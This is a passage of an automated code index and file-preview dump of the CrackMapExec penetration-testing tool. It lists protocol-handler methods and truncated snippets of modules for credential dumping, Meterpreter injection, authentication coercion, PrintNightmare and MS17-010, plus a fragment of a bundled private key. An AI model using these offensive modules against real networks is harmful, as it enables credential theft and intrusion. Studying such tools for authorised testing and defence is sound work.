method do_creds (line 149) | def do_creds(self, line):
method help_creds (line 242) | def help_creds(self):
method display_keys (line 261) | def display_keys(self, keys):
method do_keys (line 267) | def do_keys(self, line):
method help_keys (line 282) | def help_keys(self):
method do_clear_database (line 289) | def do_clear_database(self, line):
method help_clear_database (line 293) | def help_clear_database(self):
method complete_hosts (line 302) | def complete_hosts(self, text, line):
method complete_creds (line 312) | def complete_creds(self, text, line):
FILE: cme/protocols/ssh/proto_args.py
function proto_args (line 1) | def proto_args(parser, std_parser, module_parser):
FILE: cme/protocols/vnc.py
class vnc (line 20) | class vnc(connection):
method __init__ (line 21) | def __init__(self, args, db, host):
method proto_flow (line 31) | def proto_flow(self):
method proto_logger (line 41) | def proto_logger(self):
method print_host_info (line 51) | def print_host_info(self):
method create_conn_obj (line 54) | def create_conn_obj(self):
method connect_vnc (line 66) | async def connect_vnc(self, discover=False):
method plaintext_login (line 74) | def plaintext_login(self, username, password):
method screen (line 109) | async def screen(self):
method screenshot (line 119) | def screenshot(self):
FILE: cme/protocols/vnc/database.py
class database (line 21) | class database:
method __init__ (line 22) | def __init__(self, db_engine):
method db_schema (line 38) | def db_schema(db_conn):
method reflect_tables (line 58) | def reflect_tables(self):
method shutdown_db (line 73) | def shutdown_db(self):
method clear_database (line 82) | def clear_database(self):
FILE: cme/protocols/vnc/db_navigator.py
class navigator (line 7) | class navigator(DatabaseNavigator):
method do_clear_database (line 8) | def do_clear_database(self, line):
method help_clear_database (line 12) | def help_clear_database(self):
FILE: cme/protocols/vnc/proto_args.py
function proto_args (line 1) | def proto_args(parser, std_parser, module_parser):
FILE: cme/protocols/winrm.py
class winrm (line 21) | class winrm(connection):
method __init__ (line 22) | def __init__(self, args, db, host):
method proto_logger (line 34) | def proto_logger(self):
method enum_host_info (line 44) | def enum_host_info(self):
method laps_search (line 96) | def laps_search(self, username, password, ntlm_hash, domain):
method print_host_info (line 185) | def print_host_info(self):
method create_conn_obj (line 199) | def create_conn_obj(self):
method plaintext_login (line 225) | def plaintext_login(self, domain, username, password):
method hash_login (line 287) | def hash_login(self, domain, username, ntlm_hash):
method execute (line 358) | def execute(self, payload=None, get_output=False):
method ps_execute (line 370) | def ps_execute(self, payload=None, get_output=False):
method sam (line 377) | def sam(self):
method lsa (line 394) | def lsa(self):
FILE: cme/protocols/winrm/database.py
class database (line 16) | class database:
method __init__ (line 17) | def __init__(self, db_engine):
method db_schema (line 35) | def db_schema(db_conn):
method reflect_tables (line 76) | def reflect_tables(self):
method shutdown_db (line 93) | def shutdown_db(self):
method clear_database (line 102) | def clear_database(self):
method add_host (line 106) | def add_host(self, ip, port, hostname, domain, os=None):
method add_credential (line 154) | def add_credential(self, credtype, domain, username, password, pillage...
method remove_credentials (line 217) | def remove_credentials(self, creds_id):
method add_admin_user (line 227) | def add_admin_user(self, credtype, domain, username, password, host, u...
method get_admin_relations (line 262) | def get_admin_relations(self, user_id=None, host_id=None):
method remove_admin_relation (line 273) | def remove_admin_relation(self, user_ids=None, host_ids=None):
method is_credential_valid (line 283) | def is_credential_valid(self, credential_id):
method get_credentials (line 294) | def get_credentials(self, filter_term=None, cred_type=None):
method is_credential_local (line 314) | def is_credential_local(self, credential_id):
method is_host_valid (line 324) | def is_host_valid(self, host_id):
method get_hosts (line 332) | def get_hosts(self, filter_term=None):
method is_user_valid (line 357) | def is_user_valid(self, user_id):
method get_users (line 365) | def get_users(self, filter_term=None):
method get_user (line 377) | def get_user(self, domain, username):
method add_loggedin_relation (line 385) | def add_loggedin_relation(self, user_id, host_id):
method get_loggedin_relations (line 404) | def get_loggedin_relations(self, user_id=None, host_id=None):
method remove_loggedin_relations (line 413) | def remove_loggedin_relations(self, user_id=None, host_id=None):
FILE: cme/protocols/winrm/db_navigator.py
class navigator (line 8) | class navigator(DatabaseNavigator):
method display_creds (line 9) | def display_creds(self, creds):
method display_hosts (line 33) | def display_hosts(self, hosts):
method do_hosts (line 62) | def do_hosts(self, line):
method help_hosts (line 111) | def help_hosts(self):
method do_creds (line 126) | def do_creds(self, line):
method help_creds (line 206) | def help_creds(self):
method do_clear_database (line 226) | def do_clear_database(self, line):
method help_clear_database (line 230) | def help_clear_database(self):
FILE: cme/protocols/winrm/proto_args.py
function proto_args (line 3) | def proto_args(parser, std_parser, module_parser):
function get_conditional_action (line 36) | def get_conditional_action(baseAction):
FILE: cme/protocols/wmi.py
class wmi (line 22) | class wmi(connection):
method __init__ (line 24) | def __init__(self, args, db, host):
method proto_logger (line 53) | def proto_logger(self):
method create_conn_obj (line 59) | def create_conn_obj(self):
method enum_host_info (line 79) | def enum_host_info(self):
method print_host_info (line 156) | def print_host_info(self):
method check_if_admin (line 164) | def check_if_admin(self):
method kerberos_login (line 199) | def kerberos_login(self, domain, username, password="", ntlm_hash="", ...
method plaintext_login (line 283) | def plaintext_login(self, domain, username, password):
method hash_login (line 329) | def hash_login(self, domain, username, ntlm_hash):
method wmi (line 386) | def wmi(self, WQL=None, namespace=None):
method execute (line 427) | def execute(self, command=None, get_output=False):
FILE: cme/protocols/wmi/database.py
class database (line 15) | class database:
method __init__ (line 16) | def __init__(self, db_engine):
method db_schema (line 32) | def db_schema(db_conn):
method reflect_tables (line 50) | def reflect_tables(self):
method shutdown_db (line 65) | def shutdown_db(self):
method clear_database (line 74) | def clear_database(self):
FILE: cme/protocols/wmi/db_navigator.py
class navigator (line 7) | class navigator(DatabaseNavigator):
method do_clear_database (line 8) | def do_clear_database(self, line):
method help_clear_database (line 12) | def help_clear_database(self):
FILE: cme/protocols/wmi/proto_args.py
function proto_args (line 3) | def proto_args(parser, std_parser, module_parser):
function get_conditional_action (line 35) | def get_conditional_action(baseAction):
FILE: cme/protocols/wmi/wmiexec.py
class WMIEXEC (line 36) | class WMIEXEC:
method __init__ (line 37) | def __init__(self, host, username, password, domain, lmhash, nthash, d...
method execute (line 66) | def execute(self, command, output=False):
method execute_remote (line 78) | def execute_remote(self, command):
method execute_WithOutput (line 85) | def execute_WithOutput(self, command):
method queryRegistry (line 99) | def queryRegistry(self, keyName):
FILE: cme/protocols/wmi/wmiexec_event.py
class WMIEXEC_EVENT (line 39) | class WMIEXEC_EVENT:
method __init__ (line 40) | def __init__(self, host, username, password, domain, lmhash, nthash, d...
method execute (line 65) | def execute(self, command, output=False):
method execute_remote (line 74) | def execute_remote(self, command):
method execute_handler (line 81) | def execute_handler(self, command):
method process_vbs (line 96) | def process_vbs(self, command):
method checkError (line 120) | def checkError(self, banner, call_status):
method execute_vbs (line 130) | def execute_vbs(self, vbs_content):
method get_CommandResult (line 187) | def get_CommandResult(self):
method remove_Instance (line 195) | def remove_Instance(self):
FILE: cme/servers/http.py
class RequestHandler (line 15) | class RequestHandler(BaseHTTPRequestHandler):
method log_message (line 16) | def log_message(self, format, *args):
method do_GET (line 25) | def do_GET(self):
method do_POST (line 36) | def do_POST(self):
method stop_tracking_host (line 47) | def stop_tracking_host(self):
class CMEServer (line 59) | class CMEServer(threading.Thread):
method __init__ (line 60) | def __init__(self, module, context, logger, srv_host, port, server_typ...
method base_server (line 85) | def base_server(self):
method track_host (line 88) | def track_host(self, host_ip):
method run (line 91) | def run(self):
method shutdown (line 97) | def shutdown(self):
FILE: cme/servers/smb.py
class CMESMBServer (line 10) | class CMESMBServer(threading.Thread):
method __init__ (line 11) | def __init__(
method addShare (line 36) | def addShare(self, share_name, share_path):
method run (line 39) | def run(self):
method shutdown (line 45) | def shutdown(self):
FILE: tests/e2e_test.py
function get_cli_args (line 7) | def get_cli_args():
function generate_commands (line 38) | def generate_commands(args):
function run_e2e_tests (line 59) | def run_e2e_tests(args):
FILE: tests/test_smb_database.py
function db_engine (line 18) | def db_engine():
function db_setup (line 26) | def db_setup(db_engine):
function db (line 46) | def db(db_setup):
function sess (line 52) | def sess(db_engine):
function test_add_host (line 60) | def test_add_host(db):
function test_update_host (line 88) | def test_update_host(db, sess):
function test_add_credential (line 130) | def test_add_credential():
function test_update_credential (line 134) | def test_update_credential():
function test_remove_credential (line 138) | def test_remove_credential():
function test_add_admin_user (line 142) | def test_add_admin_user():
function test_get_admin_relations (line 146) | def test_get_admin_relations():
function test_remove_admin_relation (line 150) | def test_remove_admin_relation():
function test_is_credential_valid (line 154) | def test_is_credential_valid():
function test_get_credentials (line 158) | def test_get_credentials():
function test_get_credential (line 162) | def test_get_credential():
function test_is_credential_local (line 166) | def test_is_credential_local():
function test_is_host_valid (line 170) | def test_is_host_valid():
function test_get_hosts (line 174) | def test_get_hosts():
function test_is_group_valid (line 178) | def test_is_group_valid():
function test_add_group (line 182) | def test_add_group():
function test_get_groups (line 186) | def test_get_groups():
function test_get_group_relations (line 190) | def test_get_group_relations():
function test_remove_group_relations (line 194) | def test_remove_group_relations():
function test_is_user_valid (line 198) | def test_is_user_valid():
function test_get_users (line 202) | def test_get_users():
function test_get_user (line 206) | def test_get_user():
function test_get_domain_controllers (line 210) | def test_get_domain_controllers():
function test_is_share_valid (line 214) | def test_is_share_valid():
function test_add_share (line 218) | def test_add_share():
function test_get_shares (line 222) | def test_get_shares():
function test_get_shares_by_access (line 226) | def test_get_shares_by_access():
function test_get_users_with_share_access (line 230) | def test_get_users_with_share_access():
function test_add_domain_backupkey (line 234) | def test_add_domain_backupkey():
function test_get_domain_backupkey (line 238) | def test_get_domain_backupkey():
function test_is_dpapi_secret_valid (line 242) | def test_is_dpapi_secret_valid():
function test_add_dpapi_secrets (line 246) | def test_add_dpapi_secrets():
function test_get_dpapi_secrets (line 250) | def test_get_dpapi_secrets():
function test_add_loggedin_relation (line 254) | def test_add_loggedin_relation():
function test_get_loggedin_relations (line 258) | def test_get_loggedin_relations():
function test_remove_loggedin_relations (line 262) | def test_remove_loggedin_relations():
Condensed preview — 194 files, each showing path, character count, and a content snippet.
[
{
"path": ".dockerignore",
"chars": 855,
"preview": "tests\nDockerfile\n*.pyc\n*.pyo\n*.pyd\n__pycache__\n.vscode\n.venv\n.github\nbuild\nbin\ndist\n*.egg-info\ncme/data/powersploit/Reco"
},
{
"path": ".github/ISSUE_TEMPLATE/bug_report.md",
"chars": 1038,
"preview": "---\nname: Bug report\nabout: Create a report to help us improve\ntitle: ''\nlabels: ''\nassignees: ''\n\n---\n\n**Describe the b"
},
{
"path": ".github/workflows/crackmapexec-test.yml",
"chars": 898,
"preview": "name: CrackMapExec Tests\n\non:\n workflow_dispatch:\n push:\n branches: [ master ]\n pull_request:\n branches: [ mast"
},
{
"path": ".github/workflows/crackmapexec.yml",
"chars": 1062,
"preview": "name: CrackMapExec Tests & Build\n\non:\n workflow_dispatch:\n branches: [ main ]\n push:\n branches: [ main ]\n pull_"
},
{
"path": ".gitignore",
"chars": 771,
"preview": "data/cme.db\n*.bak\n*.log\n.venv\n.vscode\n.idea\n# Byte-compiled / optimized / DLL files\n__pycache__/\n*.py[cod]\nbin/\n\n\n# C ex"
},
{
"path": ".gitmodules",
"chars": 0,
"preview": ""
},
{
"path": "Dockerfile",
"chars": 485,
"preview": "FROM python:3.11-slim\n\nENV LANG=C.UTF-8\nENV LC_ALL=C.UTF-8\nENV PIP_NO_CACHE_DIR=off\n\nWORKDIR /usr/src/crackmapexec\n\nRUN "
},
{
"path": "LICENSE",
"chars": 1305,
"preview": "Copyright (c) 2022, byt3bl33d3r, mpgn_x64\nAll rights reserved.\n\nRedistribution and use in source and binary forms, with "
},
{
"path": "Makefile",
"chars": 560,
"preview": ".PHONY: tests\n\ndefault: build\n\nclean:\n\trm -f -r build/\n\trm -f -r bin/\n\trm -f -r dist/\n\tfind . -name '*.pyc' -exec rm -f "
},
{
"path": "README.md",
"chars": 1955,
"preview": "# No Longer Maintained\n\nThis project is no longer maintained due to the existence of a hostile fork.\n\n# CrackMapExec\n\n<p "
},
{
"path": "build_collector.py",
"chars": 2181,
"preview": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nimport os\nimport shutil\nimport subprocess\nimport sys\nimport time\nfrom da"
},
{
"path": "cme/.hooks/hook-lsassy.py",
"chars": 152,
"preview": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nfrom PyInstaller.utils.hooks import collect_all\n\ndatas, binaries, hidden"
},
{
"path": "cme/__init__.py",
"chars": 0,
"preview": ""
},
{
"path": "cme/cli.py",
"chars": 7540,
"preview": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nimport argparse\nimport sys\nfrom argparse import RawTextHelpFormatter\nfro"
},
{
"path": "cme/cmedb.py",
"chars": 22407,
"preview": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nimport cmd\nimport configparser\nimport csv\nimport os\nfrom os import listd"
},
{
"path": "cme/config.py",
"chars": 2147,
"preview": "# coding=utf-8\nimport os\nfrom os.path import join as path_join\nimport configparser\nfrom cme.paths import CME_PATH, DATA_"
},
{
"path": "cme/connection.py",
"chars": 17680,
"preview": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nimport random\nimport socket\nfrom socket import AF_INET, AF_INET6, SOCK_D"
},
{
"path": "cme/console.py",
"chars": 84,
"preview": "from rich.console import Console\n\ncme_console = Console(soft_wrap=True, tab_size=4)\n"
},
{
"path": "cme/context.py",
"chars": 532,
"preview": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nimport configparser\nimport os\n\n\nclass Context:\n def __init__(self, db"
},
{
"path": "cme/crackmapexec.py",
"chars": 11317,
"preview": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\nfrom cme.helpers.logger import highlight\nfrom cme.helpers.misc import ide"
},
{
"path": "cme/data/cme.conf",
"chars": 458,
"preview": "[CME]\nworkspace = default\nlast_used_db = smb\npwn3d_label = Pwn3d!\naudit_mode = \nreveal_chars_of_pwd = 0\nlog_mode = False"
},
{
"path": "cme/data/default.pem",
"chars": 2844,
"preview": "-----BEGIN PRIVATE KEY-----\r\nMIIEvgIBADANBgkqhkiG9w0BAQEFAASCBKgwggSkAgEAAoIBAQDLRxCDVVXmjcFW\r\nrvuwIZh6ywLNtffsTFQ2QAykU"
},
{
"path": "cme/data/keepass_trigger_module/AddKeePassTrigger.ps1",
"chars": 1659,
"preview": "$ExportPath = \"REPLACE_ME_ExportPath\"\n$ExportName = \"REPLACE_ME_ExportName\"\n$TriggerName = \"REPLACE_ME_TriggerName\"\n$Kee"
},
{
"path": "cme/data/keepass_trigger_module/RemoveKeePassTrigger.ps1",
"chars": 772,
"preview": "$KeePassXMLPath = \"REPLACE_ME_KeePassXMLPath\"\n$TriggerName = \"REPLACE_ME_TriggerName\"\nif($KeePassXMLPath -and ($KeePassX"
},
{
"path": "cme/data/keepass_trigger_module/RestartKeePass.ps1",
"chars": 401,
"preview": "$KeePassUser = \"REPLACE_ME_KeePassUser\"\n$KeePassBinaryPath = \"REPLACE_ME_KeePassBinaryPath\"\n$DummyServiceName = \"REPLACE"
},
{
"path": "cme/data/msol_dump/msol_dump.ps1",
"chars": 2859,
"preview": "$sqlbin=@(Get-ChildItem -Path C:\\\"Program Files\"\\\"Microsoft SQL Server\"\\ -Filter sqllocaldb.exe -Recurse).fullname\n$db=@"
},
{
"path": "cme/data/veeam_dump_module/veeam_dump_mssql.ps1",
"chars": 1565,
"preview": "$SqlDatabaseName = \"REPLACE_ME_SqlDatabase\"\n$SqlServerName = \"REPLACE_ME_SqlServer\"\n$SqlInstanceName = \"REPLACE_ME_SqlIn"
},
{
"path": "cme/data/veeam_dump_module/veeam_dump_postgresql.ps1",
"chars": 969,
"preview": "$PostgreSqlExec = \"REPLACE_ME_PostgreSqlExec\"\n$PostgresUserForWindowsAuth = \"REPLACE_ME_PostgresUserForWindowsAuth\"\n$Sql"
},
{
"path": "cme/data/wmiexec_event_vbscripts/Exec_Command_Silent.vbs",
"chars": 1763,
"preview": "Dim command\ncommand = Base64StringDecode(\"REPLACE_ME_BASE64_COMMAND\")\n\nConst TriggerTypeDaily = 1\nConst ActionTypeExec ="
},
{
"path": "cme/data/wmiexec_event_vbscripts/Exec_Command_WithOutput.vbs",
"chars": 3578,
"preview": "Dim command, outputPath\ncommand = Base64StringDecode(\"REPLACE_ME_BASE64_COMMAND\")\noutputPath = \"C:\\Windows\\Temp\\REPLACE_"
},
{
"path": "cme/first_run.py",
"chars": 2085,
"preview": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nfrom os import mkdir\nfrom os.path import exists\nfrom os.path import join"
},
{
"path": "cme/helpers/__init__.py",
"chars": 0,
"preview": ""
},
{
"path": "cme/helpers/bash.py",
"chars": 203,
"preview": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\nimport os\nfrom cme.paths import DATA_PATH\n\n\ndef get_script(path):\n wit"
},
{
"path": "cme/helpers/bloodhound.py",
"chars": 2441,
"preview": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\n\ndef add_user_bh(user, domain, logger, config):\n users_owned = []\n "
},
{
"path": "cme/helpers/http.py",
"chars": 1375,
"preview": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nimport random\n\n\ndef get_desktop_uagent(uagent=None):\n desktop_uagents"
},
{
"path": "cme/helpers/logger.py",
"chars": 493,
"preview": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nimport os\nfrom termcolor import colored\n\n\ndef write_log(data, log_name):"
},
{
"path": "cme/helpers/misc.py",
"chars": 2671,
"preview": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nimport random\nimport string\nimport re\nimport inspect\nimport os\n\n\ndef ide"
},
{
"path": "cme/helpers/msada_guids.py",
"chars": 125831,
"preview": "\"\"\"\nImpacket - Collection of Python classes for working with network protocols.\n\nSECUREAUTH LABS. Copyright (C) 2020 Sec"
},
{
"path": "cme/helpers/powershell.py",
"chars": 20167,
"preview": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\nimport os\nimport re\nfrom sys import exit\nfrom string import ascii_lowerca"
},
{
"path": "cme/loaders/__init__.py",
"chars": 0,
"preview": ""
},
{
"path": "cme/loaders/moduleloader.py",
"chars": 5505,
"preview": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nimport cme\nimport importlib\nimport traceback\nimport sys\n\nfrom os import "
},
{
"path": "cme/loaders/protocolloader.py",
"chars": 1737,
"preview": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\nfrom types import ModuleType\nfrom importlib.machinery import SourceFileLo"
},
{
"path": "cme/logger.py",
"chars": 7937,
"preview": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\nimport logging\nfrom logging import LogRecord\nfrom logging.handlers import"
},
{
"path": "cme/modules/IOXIDResolver.py",
"chars": 1566,
"preview": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\n# Credit to https://airbus-cyber-security.com/fr/the-oxid-resolver-part-"
},
{
"path": "cme/modules/MachineAccountQuota.py",
"chars": 904,
"preview": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\n\nclass CMEModule:\n \"\"\"\n Module by Shutdown and Podalirius\n\n Ini"
},
{
"path": "cme/modules/adcs.py",
"chars": 5559,
"preview": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\nimport re\nfrom impacket.ldap import ldap, ldapasn1\nfrom impacket.ldap.lda"
},
{
"path": "cme/modules/add_computer.py",
"chars": 15310,
"preview": "#!/usr/bin/env python3\n\n# -*- coding: utf-8 -*-\n\nimport ldap3\nfrom impacket.dcerpc.v5 import samr, epm, transport\n\nclass"
},
{
"path": "cme/modules/appcmd.py",
"chars": 2868,
"preview": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\nclass CMEModule:\n\n \"\"\"\n Checks for credentials in IIS Application P"
},
{
"path": "cme/modules/bh_owned.py",
"chars": 3378,
"preview": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n# Author:\n# Romain Bentz (pixis - @hackanddo)\n# Website:\n# https://beta"
},
{
"path": "cme/modules/daclread.py",
"chars": 29877,
"preview": "import binascii\nimport codecs\nimport json\nimport re\nimport datetime\nfrom enum import Enum\nfrom impacket.ldap import ldap"
},
{
"path": "cme/modules/dfscoerce.py",
"chars": 5273,
"preview": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nfrom impacket import system_errors\nfrom impacket.dcerpc.v5 import transp"
},
{
"path": "cme/modules/drop-sc.py",
"chars": 4233,
"preview": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nimport ntpath\n\n\nclass CMEModule:\n \"\"\"\n Technique discovered by @DT"
},
{
"path": "cme/modules/empire_exec.py",
"chars": 5647,
"preview": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nimport sys\nimport requests\nfrom requests import ConnectionError\n\n# The f"
},
{
"path": "cme/modules/enum_av.py",
"chars": 20313,
"preview": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\n# All credit to @an0n_r0\n# project : https://github.com/tothi/serviceDet"
},
{
"path": "cme/modules/enum_dns.py",
"chars": 2719,
"preview": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nfrom datetime import datetime\nfrom cme.helpers.logger import write_log\n\n"
},
{
"path": "cme/modules/example_module.py",
"chars": 3280,
"preview": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\n\nclass CMEModule:\n \"\"\"\n Example\n Module by @yomama\n \"\"\"\n\n "
},
{
"path": "cme/modules/find-computer.py",
"chars": 3488,
"preview": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\nimport socket\nimport sys\n\nclass CMEModule:\n '''\n Module by CyberC"
},
{
"path": "cme/modules/firefox.py",
"chars": 2194,
"preview": "#!/usr/bin/env python3\nfrom dploot.lib.target import Target\nfrom cme.protocols.smb.firefox import FirefoxTriage\n\n\nclass "
},
{
"path": "cme/modules/get-desc-users.py",
"chars": 5296,
"preview": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nfrom impacket.ldap import ldapasn1 as ldapasn1_impacket\nfrom impacket.ld"
},
{
"path": "cme/modules/get_netconnections.py",
"chars": 1251,
"preview": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nfrom datetime import datetime\nfrom cme.helpers.logger import write_log\ni"
},
{
"path": "cme/modules/gpp_autologin.py",
"chars": 2396,
"preview": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nimport xml.etree.ElementTree as ET\nfrom io import BytesIO\n\n\nclass CMEMod"
},
{
"path": "cme/modules/gpp_password.py",
"chars": 4738,
"preview": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nimport xml.etree.ElementTree as ET\nfrom Cryptodome.Cipher import AES\nfro"
},
{
"path": "cme/modules/group_members.py",
"chars": 4193,
"preview": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nfrom impacket.ldap import ldapasn1 as ldapasn1_impacket\n\nclass CMEModule"
},
{
"path": "cme/modules/groupmembership.py",
"chars": 4382,
"preview": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nfrom impacket.ldap import ldapasn1 as ldapasn1_impacket\nfrom impacket.ld"
},
{
"path": "cme/modules/handlekatz.py",
"chars": 90035,
"preview": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\n# handlekatz module for CME python3\n# author of the module : github.com/"
},
{
"path": "cme/modules/hash_spider.py",
"chars": 14663,
"preview": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n# Author: Peter Gormington (@hackerm00n on Twitter)\nimport logging\nfrom s"
},
{
"path": "cme/modules/impersonate.py",
"chars": 181744,
"preview": "# Impersonate module for CME \n# Author of the module : https://twitter.com/Defte_\n# Impersonate: https://github.com/sens"
},
{
"path": "cme/modules/install_elevated.py",
"chars": 3136,
"preview": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nfrom impacket.dcerpc.v5 import rrp\nfrom impacket.dcerpc.v5 import scmr\nf"
},
{
"path": "cme/modules/keepass_discover.py",
"chars": 4078,
"preview": "from csv import reader\n\n\nclass CMEModule:\n \"\"\"\n Search for KeePass-related files and process\n\n Module by @d3lb3"
},
{
"path": "cme/modules/keepass_trigger.py",
"chars": 24307,
"preview": "import os\nimport sys\nimport json\nfrom xmltodict import parse\nfrom time import sleep\nfrom csv import reader\nfrom base64 i"
},
{
"path": "cme/modules/laps.py",
"chars": 3657,
"preview": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\nimport json\n\nfrom impacket.ldap import ldapasn1 as ldapasn1_impacket\nfrom"
},
{
"path": "cme/modules/ldap-checker.py",
"chars": 8868,
"preview": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\nimport socket\nimport ssl\nimport asyncio\n\nfrom msldap.connection import MS"
},
{
"path": "cme/modules/lsassy_dump.py",
"chars": 6151,
"preview": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n# Author:\n# Romain Bentz (pixis - @hackanddo)\n# Website:\n# https://beta"
},
{
"path": "cme/modules/masky.py",
"chars": 4373,
"preview": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nfrom masky import Masky\nfrom cme.helpers.bloodhound import add_user_bh\n\n"
},
{
"path": "cme/modules/met_inject.py",
"chars": 3440,
"preview": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nfrom sys import exit\n\n\nclass CMEModule:\n \"\"\"\n Downloads the Meterp"
},
{
"path": "cme/modules/ms17-010.py",
"chars": 8361,
"preview": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n# All credits to https://github.com/d4t4s3c/Win7Blue\n# @d4t4s3c\n# Module "
},
{
"path": "cme/modules/msol.py",
"chars": 3349,
"preview": "# MSOL module for CME\n# Author of the module : https://twitter.com/Daahtk\n# Based on the article : https://blog.xpnsec.c"
},
{
"path": "cme/modules/mssql_priv.py",
"chars": 11341,
"preview": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n# Author:\n# Romain de Reydellet (@pentest_soka)\n\n\nfrom cme.helpers.logge"
},
{
"path": "cme/modules/nanodump.py",
"chars": 223078,
"preview": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n# nanodump module for CME python3\n# author of the module : github.com/mpg"
},
{
"path": "cme/modules/nopac.py",
"chars": 2100,
"preview": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n# Credit to https://exploit.ph/cve-2021-42287-cve-2021-42278-weaponisatio"
},
{
"path": "cme/modules/ntdsutil.py",
"chars": 7671,
"preview": "import os\nimport shutil\nimport tempfile\nimport time\n\nfrom impacket.examples.secretsdump import LocalOperations, NTDSHash"
},
{
"path": "cme/modules/ntlmv1.py",
"chars": 2048,
"preview": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nfrom impacket.dcerpc.v5 import rrp\nfrom impacket.examples.secretsdump im"
},
{
"path": "cme/modules/petitpotam.py",
"chars": 9253,
"preview": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n# From https://github.com/topotam/PetitPotam\n# All credit to @topotam\n# M"
},
{
"path": "cme/modules/pi.py",
"chars": 373229,
"preview": "from base64 import b64decode\nfrom sys import exit\nfrom os import path\n\nclass CMEModule:\n\n name = \"pi\"\n description"
},
{
"path": "cme/modules/printnightmare.py",
"chars": 10124,
"preview": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nimport sys\nfrom impacket import system_errors\nfrom impacket.dcerpc.v5.rp"
},
{
"path": "cme/modules/procdump.py",
"chars": 875950,
"preview": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n# prdocdump module for CME python3\n# author: github.com/mpgn\n# thanks to "
},
{
"path": "cme/modules/pso.py",
"chars": 4000,
"preview": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nfrom impacket.ldap import ldapasn1 as ldapasn1_impacket\nfrom impacket.ld"
},
{
"path": "cme/modules/rdcman.py",
"chars": 7811,
"preview": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nfrom dploot.triage.rdg import RDGTriage\nfrom dploot.triage.masterkeys im"
},
{
"path": "cme/modules/rdp.py",
"chars": 16003,
"preview": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nfrom sys import exit\n\nfrom cme.connection import dcom_FirewallChecker\n\nf"
},
{
"path": "cme/modules/reg-query.py",
"chars": 7224,
"preview": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nfrom impacket.dcerpc.v5.rpcrt import DCERPCException\nfrom impacket.dcerp"
},
{
"path": "cme/modules/runasppl.py",
"chars": 894,
"preview": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\n\nclass CMEModule:\n name = \"runasppl\"\n description = \"Check if the "
},
{
"path": "cme/modules/scan-network.py",
"chars": 11972,
"preview": "# Credit to https://twitter.com/snovvcrash/status/1550518555438891009\n# Credit to https://github.com/dirkjanm/adidnsdump"
},
{
"path": "cme/modules/scuffy.py",
"chars": 3049,
"preview": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nimport ntpath\nfrom sys import exit\n\n\nclass CMEModule:\n \"\"\"\n Origin"
},
{
"path": "cme/modules/shadowcoerce.py",
"chars": 10106,
"preview": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nimport time\nfrom impacket import system_errors\nfrom impacket.dcerpc.v5 i"
},
{
"path": "cme/modules/slinky.py",
"chars": 2918,
"preview": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nimport pylnk3\nimport ntpath\nfrom sys import exit\n\n\nclass CMEModule:\n "
},
{
"path": "cme/modules/spider_plus.py",
"chars": 23787,
"preview": "#!/usr/bin/env python3\r\n# -*- coding: utf-8 -*-\r\n\r\nimport json\r\nimport errno\r\nimport os\r\nimport time\r\nimport traceback\r\n"
},
{
"path": "cme/modules/spooler.py",
"chars": 5442,
